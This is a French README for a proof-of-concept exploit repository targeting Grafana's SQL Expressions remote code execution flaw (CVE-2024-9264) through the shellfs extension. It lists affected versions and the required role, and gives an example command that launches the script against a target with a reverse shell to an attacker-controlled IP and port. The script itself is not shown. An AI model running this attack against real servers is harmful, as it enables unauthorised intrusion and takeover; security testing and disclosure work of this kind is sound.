
Exploit RCE Grafana (CVE-2024-9264)
Preuve de concept pour l'exécution de code à distance dans Grafana (CVE-2024-9264)
Ce dépôt contient un script Python qui exploite une vulnérabilité d'exécution de code à distance (RCE) dans la fonctionnalité SQL Expressions de Grafana. En tirant parti d'une désinfection insuffisante des entrées, cet exploit permet à un attaquant d'exécuter des commandes shell arbitraires sur le serveur. Cela est rendu possible grâce à l'extension communautaire shellfs, qui peut être installée et chargée par un attaquant pour faciliter l'exécution de commandes.
Viewer ou supérieuresGrafana >= v11.0.0 (toutes les v11.x.y sont concernées)
python3 poc.py [--url <cible>] [--username <nom d'utilisateur>] [--password <mot de passe>] [--reverse-ip <IP>] [--reverse-port <PORT>]

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001
Ce script est destiné à des fins éducatives et à une utilisation dans des environnements contrôlés où vous avez l'autorisation de tester la sécurité du système. Une utilisation abusive de cet outil pourrait entraîner des conséquences juridiques.